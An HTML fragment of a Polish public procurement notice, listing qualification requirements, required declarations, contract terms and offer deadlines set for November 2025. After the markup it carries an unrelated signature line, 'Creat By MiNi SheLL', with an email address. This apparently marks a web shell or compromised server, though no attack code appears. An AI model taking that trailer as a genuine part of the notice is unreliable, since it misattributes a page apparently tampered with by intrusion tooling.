Reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a)	Formularz ofertowy wg zał. nr 1 do SWZ; <br/>b)	Oświadczenie Wykonawców wspólnie ubiegających się o zamówienie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy, wg zał. nr 4 (jeśli dotyczy);<br/>c) Odpowiedni dokument potwierdzający umocowanie do reprezentowania Wykonawcy, w tym do podpisania oferty (lub do podpisania pełnomocnictwa - jeżeli dotyczy), tj. odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (m.in. spółka cywilna, konsorcjum) - art. 58 ustawy Pzp.<br/>W takim przypadku Wykonawcy ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>2. Szczegółowe informacje dot. składania ofert przez wykonawców wspólnie ubiegających się o udzielenie zawiera ROZDZ.<br/>XVIII SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia określa projekt umowy - zał. nr 3 do swz <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-21 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/1214217</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-21 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-12-20</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com